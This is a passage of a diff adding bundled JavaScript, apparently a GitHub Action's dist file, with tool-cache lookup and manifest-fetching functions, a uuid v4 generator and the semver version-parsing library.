move can fail on Windows due to + // anti-virus software having an open handle on a file. + const destPath = path.join(destFolder, targetFile); + core.debug(`destination file ${destPath}`); + yield io.cp(sourceFile, destPath); + // write .complete + _completeToolPath(tool, version, arch); + return destFolder; + }); +} +exports.cacheFile = cacheFile; +/** + * Finds the path to a tool version in the local installed tool cache + * + * @param toolName name of the tool + * @param versionSpec version of the tool + * @param arch optional arch. defaults to arch of computer + */ +function find(toolName, versionSpec, arch) { + if (!toolName) { + throw new Error('toolName parameter is required'); + } + if (!versionSpec) { + throw new Error('versionSpec parameter is required'); + } + arch = arch || os.arch(); + // attempt to resolve an explicit version + if (!isExplicitVersion(versionSpec)) { + const localVersions = findAllVersions(toolName, arch); + const match = evaluateVersions(localVersions, versionSpec); + versionSpec = match; + } + // check for the explicit version in the cache + let toolPath = ''; + if (versionSpec) { + versionSpec = semver.clean(versionSpec) || ''; + const cachePath = path.join(_getCacheDirectory(), toolName, versionSpec, arch); + core.debug(`checking cache: ${cachePath}`); + if (fs.existsSync(cachePath) && fs.existsSync(`${cachePath}.complete`)) { + core.debug(`Found tool in cache ${toolName} ${versionSpec} ${arch}`); + toolPath = cachePath; + } + else { + core.debug('not found'); + } + } + return toolPath; +} +exports.find = find; +/** + * Finds the paths to all versions of a tool that are installed in the local tool cache + * + * @param toolName name of the tool + * @param arch optional arch. 
defaults to arch of computer + */ +function findAllVersions(toolName, arch) { + const versions = []; + arch = arch || os.arch(); + const toolPath = path.join(_getCacheDirectory(), toolName); + if (fs.existsSync(toolPath)) { + const children = fs.readdirSync(toolPath); + for (const child of children) { + if (isExplicitVersion(child)) { + const fullPath = path.join(toolPath, child, arch || ''); + if (fs.existsSync(fullPath) && fs.existsSync(`${fullPath}.complete`)) { + versions.push(child); + } + } + } + } + return versions; +} +exports.findAllVersions = findAllVersions; +function getManifestFromRepo(owner, repo, auth, branch = 'master') { + return __awaiter(this, void 0, void 0, function* () { + let releases = []; + const treeUrl = `https://api.github.com/repos/${owner}/${repo}/git/trees/${branch}`; + const http = new httpm.HttpClient('tool-cache'); + const headers = {}; + if (auth) { + core.debug('set auth'); + headers.authorization = auth; + } + const response = yield http.getJson(treeUrl, headers); + if (!response.result) { + return releases; + } + let manifestUrl = ''; + for (const item of response.result.tree) { + if (item.path === 'versions-manifest.json') { + manifestUrl = item.url; + break; + } + } + headers['accept'] = 'application/vnd.github.VERSION.raw'; + let versionsRaw = yield (yield http.get(manifestUrl, headers)).readBody(); + if (versionsRaw) { + // shouldn't be needed but protects against invalid json saved with BOM + versionsRaw = versionsRaw.replace(/^\uFEFF/, ''); + try { + releases = JSON.parse(versionsRaw); + } + catch (_a) { + core.debug('Invalid json'); + } + } + return releases; + }); +} +exports.getManifestFromRepo = getManifestFromRepo; +function findFromManifest(versionSpec, stable, manifest, archFilter = os.arch()) { + return __awaiter(this, void 0, void 0, function* () { + // wrap the internal impl + const match = yield mm._findMatch(versionSpec, stable, manifest, archFilter); + return match; + }); +} +exports.findFromManifest = 
findFromManifest; +function _createExtractFolder(dest) { + return __awaiter(this, void 0, void 0, function* () { + if (!dest) { + // create a temp dir + dest = path.join(_getTempDirectory(), v4_1.default()); + } + yield io.mkdirP(dest); + return dest; + }); +} +function _createToolPath(tool, version, arch) { + return __awaiter(this, void 0, void 0, function* () { + const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); + core.debug(`destination ${folderPath}`); + const markerPath = `${folderPath}.complete`; + yield io.rmRF(folderPath); + yield io.rmRF(markerPath); + yield io.mkdirP(folderPath); + return folderPath; + }); +} +function _completeToolPath(tool, version, arch) { + const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); + const markerPath = `${folderPath}.complete`; + fs.writeFileSync(markerPath, ''); + core.debug('finished caching tool'); +} +/** + * Check if version string is explicit + * + * @param versionSpec version string to check + */ +function isExplicitVersion(versionSpec) { + const c = semver.clean(versionSpec) || ''; + core.debug(`isExplicit: ${c}`); + const valid = semver.valid(c) != null; + core.debug(`explicit? 
${valid}`); + return valid; +} +exports.isExplicitVersion = isExplicitVersion; +/** + * Get the highest satisfiying semantic version in `versions` which satisfies `versionSpec` + * + * @param versions array of versions to evaluate + * @param versionSpec semantic version spec to satisfy + */ +function evaluateVersions(versions, versionSpec) { + let version = ''; + core.debug(`evaluating ${versions.length} versions`); + versions = versions.sort((a, b) => { + if (semver.gt(a, b)) { + return 1; + } + return -1; + }); + for (let i = versions.length - 1; i >= 0; i--) { + const potential = versions[i]; + const satisfied = semver.satisfies(potential, versionSpec); + if (satisfied) { + version = potential; + break; + } + } + if (version) { + core.debug(`matched: ${version}`); + } + else { + core.debug('match not found'); + } + return version; +} +exports.evaluateVersions = evaluateVersions; +/** + * Gets RUNNER_TOOL_CACHE + */ +function _getCacheDirectory() { + const cacheDirectory = process.env['RUNNER_TOOL_CACHE'] || ''; + assert_1.ok(cacheDirectory, 'Expected RUNNER_TOOL_CACHE to be defined'); + return cacheDirectory; +} +/** + * Gets RUNNER_TEMP + */ +function _getTempDirectory() { + const tempDirectory = process.env['RUNNER_TEMP'] || ''; + assert_1.ok(tempDirectory, 'Expected RUNNER_TEMP to be defined'); + return tempDirectory; +} +/** + * Gets a global variable + */ +function _getGlobal(key, defaultValue) { + /* eslint-disable @typescript-eslint/no-explicit-any */ + const value = global[key]; + /* eslint-enable @typescript-eslint/no-explicit-any */ + return value !== undefined ? value : defaultValue; +} +/** + * Returns an array of unique values. + * @param values Values to make unique. 
+ */ +function _unique(values) { + return Array.from(new Set(values)); +} +//# sourceMappingURL=tool-cache.js.map + +/***/ }), + +/***/ 7701: +/***/ ((module) => { + +/** + * Convert array of 16 byte values to UUID string format of the form: + * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX + */ +var byteToHex = []; +for (var i = 0; i < 256; ++i) { + byteToHex[i] = (i + 0x100).toString(16).substr(1); +} + +function bytesToUuid(buf, offset) { + var i = offset || 0; + var bth = byteToHex; + // join used to fix memory issue caused by concatenation: https://bugs.chromium.org/p/v8/issues/detail?id=3175#c4 + return ([ + bth[buf[i++]], bth[buf[i++]], + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], + bth[buf[i++]], bth[buf[i++]], + bth[buf[i++]], bth[buf[i++]] + ]).join(''); +} + +module.exports = bytesToUuid; + + +/***/ }), + +/***/ 7269: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +// Unique ID creation requires a high quality random # generator. In node.js +// this is pretty straight-forward - we use the crypto API. + +var crypto = __nccwpck_require__(6113); + +module.exports = function nodeRNG() { + return crypto.randomBytes(16); +}; + + +/***/ }), + +/***/ 7468: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +var rng = __nccwpck_require__(7269); +var bytesToUuid = __nccwpck_require__(7701); + +function v4(options, buf, offset) { + var i = buf && offset || 0; + + if (typeof(options) == 'string') { + buf = options === 'binary' ? 
new Array(16) : null; + options = null; + } + options = options || {}; + + var rnds = options.random || (options.rng || rng)(); + + // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` + rnds[6] = (rnds[6] & 0x0f) | 0x40; + rnds[8] = (rnds[8] & 0x3f) | 0x80; + + // Copy bytes to buffer, if provided + if (buf) { + for (var ii = 0; ii < 16; ++ii) { + buf[i + ii] = rnds[ii]; + } + } + + return buf || bytesToUuid(rnds); +} + +module.exports = v4; + + +/***/ }), + +/***/ 5911: +/***/ ((module, exports) => { + +exports = module.exports = SemVer + +var debug +/* istanbul ignore next */ +if (typeof process === 'object' && + process.env && + process.env.NODE_DEBUG && + /\bsemver\b/i.test(process.env.NODE_DEBUG)) { + debug = function () { + var args = Array.prototype.slice.call(arguments, 0) + args.unshift('SEMVER') + console.log.apply(console, args) + } +} else { + debug = function () {} +} + +// Note: this is the semver.org version of the spec that it implements +// Not necessarily the package version of this code. +exports.SEMVER_SPEC_VERSION = '2.0.0' + +var MAX_LENGTH = 256 +var MAX_SAFE_INTEGER = Number.MAX_SAFE_INTEGER || + /* istanbul ignore next */ 9007199254740991 + +// Max safe segment length for coercion. +var MAX_SAFE_COMPONENT_LENGTH = 16 + +var MAX_SAFE_BUILD_LENGTH = MAX_LENGTH - 6 + +// The actual regexps go on exports.re +var re = exports.re = [] +var safeRe = exports.safeRe = [] +var src = exports.src = [] +var t = exports.tokens = {} +var R = 0 + +function tok (n) { + t[n] = R++ +} + +var LETTERDASHNUMBER = '[a-zA-Z0-9-]' + +// Replace some greedy regex tokens to prevent regex dos issues. These regex are +// used internally via the safeRe object since all inputs in this library get +// normalized first to trim and collapse all extra whitespace. The original +// regexes are exported for userland consumption and lower level usage. 
A +// future breaking change could export the safer regex only with a note that +// all input should have extra whitespace removed. +var safeRegexReplacements = [ + ['\\s', 1], + ['\\d', MAX_LENGTH], + [LETTERDASHNUMBER, MAX_SAFE_BUILD_LENGTH], +] + +function makeSafeRe (value) { + for (var i = 0; i < safeRegexReplacements.length; i++) { + var token = safeRegexReplacements[i][0] + var max = safeRegexReplacements[i][1] + value = value + .split(token + '*').join(token + '{0,' + max + '}') + .split(token + '+').join(token + '{1,' + max + '}') + } + return value +} + +// The following Regular Expressions can be used for tokenizing, +// validating, and parsing SemVer version strings. + +// ## Numeric Identifier +// A single `0`, or a non-zero digit followed by zero or more digits. + +tok('NUMERICIDENTIFIER') +src[t.NUMERICIDENTIFIER] = '0|[1-9]\\d*' +tok('NUMERICIDENTIFIERLOOSE') +src[t.NUMERICIDENTIFIERLOOSE] = '\\d+' + +// ## Non-numeric Identifier +// Zero or more digits, followed by a letter or hyphen, and then zero or +// more letters, digits, or hyphens. + +tok('NONNUMERICIDENTIFIER') +src[t.NONNUMERICIDENTIFIER] = '\\d*[a-zA-Z-]' + LETTERDASHNUMBER + '*' + +// ## Main Version +// Three dot-separated numeric identifiers. + +tok('MAINVERSION') +src[t.MAINVERSION] = '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIER] + ')' + +tok('MAINVERSIONLOOSE') +src[t.MAINVERSIONLOOSE] = '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')' + +// ## Pre-release Version Identifier +// A numeric identifier, or a non-numeric identifier. 
+ +tok('PRERELEASEIDENTIFIER') +src[t.PRERELEASEIDENTIFIER] = '(?:' + src[t.NUMERICIDENTIFIER] + + '|' + src[t.NONNUMERICIDENTIFIER] + ')' + +tok('PRERELEASEIDENTIFIERLOOSE') +src[t.PRERELEASEIDENTIFIERLOOSE] = '(?:' + src[t.NUMERICIDENTIFIERLOOSE] + + '|' + src[t.NONNUMERICIDENTIFIER] + ')' + +// ## Pre-release Version +// Hyphen, followed by one or more dot-separated pre-release version +// identifiers. + +tok('PRERELEASE') +src[t.PRERELEASE] = '(?:-(' + src[t.PRERELEASEIDENTIFIER] + + '(?:\\.' + src[t.PRERELEASEIDENTIFIER] + ')*))' + +tok('PRERELEASELOOSE') +src[t.PRERELEASELOOSE] = '(?:-?(' + src[t.PRERELEASEIDENTIFIERLOOSE] + + '(?:\\.' + src[t.PRERELEASEIDENTIFIERLOOSE] + ')*))' + +// ## Build Metadata Identifier +// Any combination of digits, letters, or hyphens. + +tok('BUILDIDENTIFIER') +src[t.BUILDIDENTIFIER] = LETTERDASHNUMBER + '+' + +// ## Build Metadata +// Plus sign, followed by one or more period-separated build metadata +// identifiers. + +tok('BUILD') +src[t.BUILD] = '(?:\\+(' + src[t.BUILDIDENTIFIER] + + '(?:\\.' + src[t.BUILDIDENTIFIER] + ')*))' + +// ## Full Version String +// A main version, followed optionally by a pre-release version and +// build metadata. + +// Note that the only major, minor, patch, and pre-release sections of +// the version string are capturing groups. The build metadata is not a +// capturing group, because it should not ever be used in version +// comparison. + +tok('FULL') +tok('FULLPLAIN') +src[t.FULLPLAIN] = 'v?' + src[t.MAINVERSION] + + src[t.PRERELEASE] + '?' + + src[t.BUILD] + '?' + +src[t.FULL] = '^' + src[t.FULLPLAIN] + '$' + +// like full, but allows v1.2.3 and =1.2.3, which people do sometimes. +// also, 1.0.0alpha1 (prerelease without the hyphen) which is pretty +// common in the npm registry. +tok('LOOSEPLAIN') +src[t.LOOSEPLAIN] = '[v=\\s]*' + src[t.MAINVERSIONLOOSE] + + src[t.PRERELEASELOOSE] + '?' + + src[t.BUILD] + '?' 
+ +tok('LOOSE') +src[t.LOOSE] = '^' + src[t.LOOSEPLAIN] + '$' + +tok('GTLT') +src[t.GTLT] = '((?:<|>)?=?)' + +// Something like "2.*" or "1.2.x". +// Note that "x.x" is a valid xRange identifer, meaning "any version" +// Only the first item is strictly required. +tok('XRANGEIDENTIFIERLOOSE') +src[t.XRANGEIDENTIFIERLOOSE] = src[t.NUMERICIDENTIFIERLOOSE] + '|x|X|\\*' +tok('XRANGEIDENTIFIER') +src[t.XRANGEIDENTIFIER] = src[t.NUMERICIDENTIFIER] + '|x|X|\\*' + +tok('XRANGEPLAIN') +src[t.XRANGEPLAIN] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIER] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + + '(?:' + src[t.PRERELEASE] + ')?' + + src[t.BUILD] + '?' + + ')?)?' + +tok('XRANGEPLAINLOOSE') +src[t.XRANGEPLAINLOOSE] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + + '(?:' + src[t.PRERELEASELOOSE] + ')?' + + src[t.BUILD] + '?' + + ')?)?' + +tok('XRANGE') +src[t.XRANGE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAIN] + '$' +tok('XRANGELOOSE') +src[t.XRANGELOOSE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAINLOOSE] + '$' + +// Coercion. +// Extract anything that could conceivably be a part of a valid semver +tok('COERCE') +src[t.COERCE] = '(^|[^\\d])' + + '(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '})' + + '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + + '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + + '(?:$|[^\\d])' +tok('COERCERTL') +re[t.COERCERTL] = new RegExp(src[t.COERCE], 'g') +safeRe[t.COERCERTL] = new RegExp(makeSafeRe(src[t.COERCE]), 'g') + +// Tilde ranges. 
+// Meaning is "reasonably at or greater than" +tok('LONETILDE') +src[t.LONETILDE] = '(?:~>?)' + +tok('TILDETRIM') +src[t.TILDETRIM] = '(\\s*)' + src[t.LONETILDE] + '\\s+' +re[t.TILDETRIM] = new RegExp(src[t.TILDETRIM], 'g') +safeRe[t.TILDETRIM] = new RegExp(makeSafeRe(src[t.TILDETRIM]), 'g') +var tildeTrimReplace = '$1~' + +tok('TILDE') +src[t.TILDE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAIN] + '$' +tok('TILDELOOSE') +src[t.TILDELOOSE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAINLOOSE] + '$' + +// Caret ranges. +// Meaning is "at least and backwards compatible with" +tok('LONECARET') +src[t.LONECARET] = '(?:\\^)' + +tok('CARETTRIM') +src[t.CARETTRIM] = '(\\s*)' + src[t.LONECARET] + '\\s+' +re[t.CARETTRIM] = new RegExp(src[t.CARETTRIM], 'g') +safeRe[t.CARETTRIM] = new RegExp(makeSafeRe(src[t.CARETTRIM]), 'g') +var caretTrimReplace = '$1^' + +tok('CARET') +src[t.CARET] = '^' + src[t.LONECARET] + src[t.XRANGEPLAIN] + '$' +tok('CARETLOOSE') +src[t.CARETLOOSE] = '^' + src[t.LONECARET] + src[t.XRANGEPLAINLOOSE] + '$' + +// A simple gt/lt/eq thing, or just "" to indicate "any version" +tok('COMPARATORLOOSE') +src[t.COMPARATORLOOSE] = '^' + src[t.GTLT] + '\\s*(' + src[t.LOOSEPLAIN] + ')$|^$' +tok('COMPARATOR') +src[t.COMPARATOR] = '^' + src[t.GTLT] + '\\s*(' + src[t.FULLPLAIN] + ')$|^$' + +// An expression to strip any whitespace between the gtlt and the thing +// it modifies, so that `> 1.2.3` ==> `>1.2.3` +tok('COMPARATORTRIM') +src[t.COMPARATORTRIM] = '(\\s*)' + src[t.GTLT] + + '\\s*(' + src[t.LOOSEPLAIN] + '|' + src[t.XRANGEPLAIN] + ')' + +// this one has to use the /g flag +re[t.COMPARATORTRIM] = new RegExp(src[t.COMPARATORTRIM], 'g') +safeRe[t.COMPARATORTRIM] = new RegExp(makeSafeRe(src[t.COMPARATORTRIM]), 'g') +var comparatorTrimReplace = '$1$2$3' + +// Something like `1.2.3 - 1.2.4` +// Note that these all use the loose form, because they'll be +// checked against either the strict or loose comparator form +// later. 
+tok('HYPHENRANGE') +src[t.HYPHENRANGE] = '^\\s*(' + src[t.XRANGEPLAIN] + ')' + + '\\s+-\\s+' + + '(' + src[t.XRANGEPLAIN] + ')' + + '\\s*$' + +tok('HYPHENRANGELOOSE') +src[t.HYPHENRANGELOOSE] = '^\\s*(' + src[t.XRANGEPLAINLOOSE] + ')' + + '\\s+-\\s+' + + '(' + src[t.XRANGEPLAINLOOSE] + ')' + + '\\s*$' + +// Star ranges basically just allow anything at all. +tok('STAR') +src[t.STAR] = '(<|>)?=?\\s*\\*' + +// Compile to actual regexp objects. +// All are flag-free, unless they were created above with a flag. +for (var i = 0; i < R; i++) { + debug(i, src[i]) + if (!re[i]) { + re[i] = new RegExp(src[i]) + + // Replace all greedy whitespace to prevent regex dos issues. These regex are + // used internally via the safeRe object since all inputs in this library get + // normalized first to trim and collapse all extra whitespace. The original + // regexes are exported for userland consumption and lower level usage. A + // future breaking change could export the safer regex only with a note that + // all input should have extra whitespace removed. + safeRe[i] = new RegExp(makeSafeRe(src[i])) + } +} + +exports.parse = parse +function parse (version, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + if (version instanceof SemVer) { + return version + } + + if (typeof version !== 'string') { + return null + } + + if (version.length > MAX_LENGTH) { + return null + } + + var r = options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL] + if (!r.test(version)) { + return null + } + + try { + return new SemVer(version, options) + } catch (er) { + return null + } +} + +exports.valid = valid +function valid (version, options) { + var v = parse(version, options) + return v ? v.version : null +} + +exports.clean = clean +function clean (version, options) { + var s = parse(version.trim().replace(/^[=v]+/, ''), options) + return s ? 
s.version : null +} + +exports.SemVer = SemVer + +function SemVer (version, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + if (version instanceof SemVer) { + if (version.loose === options.loose) { + return version + } else { + version = version.version + } + } else if (typeof version !== 'string') { + throw new TypeError('Invalid Version: ' + version) + } + + if (version.length > MAX_LENGTH) { + throw new TypeError('version is longer than ' + MAX_LENGTH + ' characters') + } + + if (!(this instanceof SemVer)) { + return new SemVer(version, options) + } + + debug('SemVer', version, options) + this.options = options + this.loose = !!options.loose + + var m = version.trim().match(options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL]) + + if (!m) { + throw new TypeError('Invalid Version: ' + version) + } + + this.raw = version + + // these are actually numbers + this.major = +m[1] + this.minor = +m[2] + this.patch = +m[3] + + if (this.major > MAX_SAFE_INTEGER || this.major < 0) { + throw new TypeError('Invalid major version') + } + + if (this.minor > MAX_SAFE_INTEGER || this.minor < 0) { + throw new TypeError('Invalid minor version') + } + + if (this.patch > MAX_SAFE_INTEGER || this.patch < 0) { + throw new TypeError('Invalid patch version') + } + + // numberify any prerelease numeric ids + if (!m[4]) { + this.prerelease = [] + } else { + this.prerelease = m[4].split('.').map(function (id) { + if (/^[0-9]+$/.test(id)) { + var num = +id + if (num >= 0 && num < MAX_SAFE_INTEGER) { + return num + } + } + return id + }) + } + + this.build = m[5] ? m[5].split('.') : [] + this.format() +} + +SemVer.prototype.format = function () { + this.version = this.major + '.' + this.minor + '.' 
+ this.patch + if (this.prerelease.length) { + this.version += '-' + this.prerelease.join('.') + } + return this.version +} + +SemVer.prototype.toString = function () { + return this.version +} + +SemVer.prototype.compare = function (other) { + debug('SemVer.compare', this.version, this.options, other) + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + return this.compareMain(other) || this.comparePre(other) +} + +SemVer.prototype.compareMain = function (other) { + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + return compareIdentifiers(this.major, other.major) || + compareIdentifiers(this.minor, other.minor) || + compareIdentifiers(this.patch, other.patch) +} + +SemVer.prototype.comparePre = function (other) { + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + // NOT having a prerelease is > having one + if (this.prerelease.length && !other.prerelease.length) { + return -1 + } else if (!this.prerelease.length && other.prerelease.length) { + return 1 + } else if (!this.prerelease.length && !other.prerelease.length) { + return 0 + } + + var i = 0 + do { + var a = this.prerelease[i] + var b = other.prerelease[i] + debug('prerelease compare', i, a, b) + if (a === undefined && b === undefined) { + return 0 + } else if (b === undefined) { + return 1 + } else if (a === undefined) { + return -1 + } else if (a === b) { + continue + } else { + return compareIdentifiers(a, b) + } + } while (++i) +} + +SemVer.prototype.compareBuild = function (other) { + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + var i = 0 + do { + var a = this.build[i] + var b = other.build[i] + debug('prerelease compare', i, a, b) + if (a === undefined && b === undefined) { + return 0 + } else if (b === undefined) { + return 1 + } else if (a === undefined) { + return -1 + } else if (a === b) { + continue + } else { + return compareIdentifiers(a, b) + } + } while 
(++i) +} + +// preminor will bump the version up to the next minor release, and immediately +// down to pre-release. premajor and prepatch work the same way. +SemVer.prototype.inc = function (release, identifier) { + switch (release) { + case 'premajor': + this.prerelease.length = 0 + this.patch = 0 + this.minor = 0 + this.major++ + this.inc('pre', identifier) + break + case 'preminor': + this.prerelease.length = 0 + this.patch = 0 + this.minor++ + this.inc('pre', identifier) + break + case 'prepatch': + // If this is already a prerelease, it will bump to the next version + // drop any prereleases that might already exist, since they are not + // relevant at this point. + this.prerelease.length = 0 + this.inc('patch', identifier) + this.inc('pre', identifier) + break + // If the input is a non-prerelease version, this acts the same as + // prepatch. + case 'prerelease': + if (this.prerelease.length === 0) { + this.inc('patch', identifier) + } + this.inc('pre', identifier) + break + + case 'major': + // If this is a pre-major version, bump up to the same major version. + // Otherwise increment major. + // 1.0.0-5 bumps to 1.0.0 + // 1.1.0 bumps to 2.0.0 + if (this.minor !== 0 || + this.patch !== 0 || + this.prerelease.length === 0) { + this.major++ + } + this.minor = 0 + this.patch = 0 + this.prerelease = [] + break + case 'minor': + // If this is a pre-minor version, bump up to the same minor version. + // Otherwise increment minor. + // 1.2.0-5 bumps to 1.2.0 + // 1.2.1 bumps to 1.3.0 + if (this.patch !== 0 || this.prerelease.length === 0) { + this.minor++ + } + this.patch = 0 + this.prerelease = [] + break + case 'patch': + // If this is not a pre-release version, it will increment the patch. + // If it is a pre-release it will bump up to the same patch version. + // 1.2.0-5 patches to 1.2.0 + // 1.2.0 patches to 1.2.1 + if (this.prerelease.length === 0) { + this.patch++ + } + this.prerelease = [] + break + // This probably shouldn't be used publicly. 
+ // 1.0.0 "pre" would become 1.0.0-0 which is the wrong direction. + case 'pre': + if (this.prerelease.length === 0) { + this.prerelease = [0] + } else { + var i = this.prerelease.length + while (--i >= 0) { + if (typeof this.prerelease[i] === 'number') { + this.prerelease[i]++ + i = -2 + } + } + if (i === -1) { + // didn't increment anything + this.prerelease.push(0) + } + } + if (identifier) { + // 1.2.0-beta.1 bumps to 1.2.0-beta.2, + // 1.2.0-beta.fooblz or 1.2.0-beta bumps to 1.2.0-beta.0 + if (this.prerelease[0] === identifier) { + if (isNaN(this.prerelease[1])) { + this.prerelease = [identifier, 0] + } + } else { + this.prerelease = [identifier, 0] + } + } + break + + default: + throw new Error('invalid increment argument: ' + release) + } + this.format() + this.raw = this.version + return this +} + +exports.inc = inc +function inc (version, release, loose, identifier) { + if (typeof (loose) === 'string') { + identifier = loose + loose = undefined + } + + try { + return new SemVer(version, loose).inc(release, identifier).version + } catch (er) { + return null + } +} + +exports.diff = diff +function diff (version1, version2) { + if (eq(version1, version2)) { + return null + } else { + var v1 = parse(version1) + var v2 = parse(version2) + var prefix = '' + if (v1.prerelease.length || v2.prerelease.length) { + prefix = 'pre' + var defaultResult = 'prerelease' + } + for (var key in v1) { + if (key === 'major' || key === 'minor' || key === 'patch') { + if (v1[key] !== v2[key]) { + return prefix + key + } + } + } + return defaultResult // may be undefined + } +} + +exports.compareIdentifiers = compareIdentifiers + +var numeric = /^[0-9]+$/ +function compareIdentifiers (a, b) { + var anum = numeric.test(a) + var bnum = numeric.test(b) + + if (anum && bnum) { + a = +a + b = +b + } + + return a === b ? 0 + : (anum && !bnum) ? -1 + : (bnum && !anum) ? 1 + : a < b ? 
-1 + : 1 +} + +exports.rcompareIdentifiers = rcompareIdentifiers +function rcompareIdentifiers (a, b) { + return compareIdentifiers(b, a) +} + +exports.major = major +function major (a, loose) { + return new SemVer(a, loose).major +} + +exports.minor = minor +function minor (a, loose) { + return new SemVer(a, loose).minor +} + +exports.patch = patch +function patch (a, loose) { + return new SemVer(a, loose).patch +} + +exports.compare = compare +function compare (a, b, loose) { + return new SemVer(a, loose).compare(new SemVer(b, loose)) +} + +exports.compareLoose = compareLoose +function compareLoose (a, b) { + return compare(a, b, true) +} + +exports.compareBuild = compareBuild +function compareBuild (a, b, loose) { + var versionA = new SemVer(a, loose) + var versionB = new SemVer(b, loose) + return versionA.compare(versionB) || versionA.compareBuild(versionB) +} + +exports.rcompare = rcompare +function rcompare (a, b, loose) { + return compare(b, a, loose) +} + +exports.sort = sort +function sort (list, loose) { + return list.sort(function (a, b) { + return exports.compareBuild(a, b, loose) + }) +} + +exports.rsort = rsort +function rsort (list, loose) { + return list.sort(function (a, b) { + return exports.compareBuild(b, a, loose) + }) +} + +exports.gt = gt +function gt (a, b, loose) { + return compare(a, b, loose) > 0 +} + +exports.lt = lt +function lt (a, b, loose) { + return compare(a, b, loose) < 0 +} + +exports.eq = eq +function eq (a, b, loose) { + return compare(a, b, loose) === 0 +} + +exports.neq = neq +function neq (a, b, loose) { + return compare(a, b, loose) !== 0 +} + +exports.gte = gte +function gte (a, b, loose) { + return compare(a, b, loose) >= 0 +} + +exports.lte = lte +function lte (a, b, loose) { + return compare(a, b, loose) <= 0 +} + +exports.cmp = cmp +function cmp (a, op, b, loose) { + switch (op) { + case '===': + if (typeof a === 'object') + a = a.version + if (typeof b === 'object') + b = b.version + return a === b + + case '!==': + 
if (typeof a === 'object') + a = a.version + if (typeof b === 'object') + b = b.version + return a !== b + + case '': + case '=': + case '==': + return eq(a, b, loose) + + case '!=': + return neq(a, b, loose) + + case '>': + return gt(a, b, loose) + + case '>=': + return gte(a, b, loose) + + case '<': + return lt(a, b, loose) + + case '<=': + return lte(a, b, loose) + + default: + throw new TypeError('Invalid operator: ' + op) + } +} + +exports.Comparator = Comparator +function Comparator (comp, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + if (comp instanceof Comparator) { + if (comp.loose === !!options.loose) { + return comp + } else { + comp = comp.value + } + } + + if (!(this instanceof Comparator)) { + return new Comparator(comp, options) + } + + comp = comp.trim().split(/\s+/).join(' ') + debug('comparator', comp, options) + this.options = options + this.loose = !!options.loose + this.parse(comp) + + if (this.semver === ANY) { + this.value = '' + } else { + this.value = this.operator + this.semver.version + } + + debug('comp', this) +} + +var ANY = {} +Comparator.prototype.parse = function (comp) { + var r = this.options.loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] + var m = comp.match(r) + + if (!m) { + throw new TypeError('Invalid comparator: ' + comp) + } + + this.operator = m[1] !== undefined ? m[1] : '' + if (this.operator === '=') { + this.operator = '' + } + + // if it literally is just '>' or '' then allow anything. 
+ if (!m[2]) { + this.semver = ANY + } else { + this.semver = new SemVer(m[2], this.options.loose) + } +} + +Comparator.prototype.toString = function () { + return this.value +} + +Comparator.prototype.test = function (version) { + debug('Comparator.test', version, this.options.loose) + + if (this.semver === ANY || version === ANY) { + return true + } + + if (typeof version === 'string') { + try { + version = new SemVer(version, this.options) + } catch (er) { + return false + } + } + + return cmp(version, this.operator, this.semver, this.options) +} + +Comparator.prototype.intersects = function (comp, options) { + if (!(comp instanceof Comparator)) { + throw new TypeError('a Comparator is required') + } + + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + var rangeTmp + + if (this.operator === '') { + if (this.value === '') { + return true + } + rangeTmp = new Range(comp.value, options) + return satisfies(this.value, rangeTmp, options) + } else if (comp.operator === '') { + if (comp.value === '') { + return true + } + rangeTmp = new Range(this.value, options) + return satisfies(comp.semver, rangeTmp, options) + } + + var sameDirectionIncreasing = + (this.operator === '>=' || this.operator === '>') && + (comp.operator === '>=' || comp.operator === '>') + var sameDirectionDecreasing = + (this.operator === '<=' || this.operator === '<') && + (comp.operator === '<=' || comp.operator === '<') + var sameSemVer = this.semver.version === comp.semver.version + var differentDirectionsInclusive = + (this.operator === '>=' || this.operator === '<=') && + (comp.operator === '>=' || comp.operator === '<=') + var oppositeDirectionsLessThan = + cmp(this.semver, '<', comp.semver, options) && + ((this.operator === '>=' || this.operator === '>') 